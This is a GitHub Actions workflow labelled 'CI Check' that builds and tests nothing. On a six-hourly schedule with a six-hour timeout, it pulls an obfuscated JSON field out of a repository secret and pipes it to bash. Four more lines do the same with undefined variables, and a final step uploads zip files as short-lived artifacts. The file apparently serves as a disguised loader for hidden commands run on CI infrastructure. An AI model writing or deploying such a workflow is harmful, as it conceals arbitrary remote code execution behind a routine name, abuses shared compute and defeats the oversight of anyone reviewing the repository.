name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '1 0,6,12,18 * * *'
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          jmip3: ${{ secrets.jmip3 }}
        run: |
          printf '%s' "$jmip3" | jq -r .u82 | /bin/bash
          echo $sq29 | jq -r .s0304 | /bin/bash
          echo $iawnw7359 | jq -r .okbd9 | /bin/bash
          echo $tou2 | jq -r .d0794 | /bin/bash
          echo $sl84 | jq -r .tm06 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: B5EFk053
          path: "*.zip"
          retention-days: 1
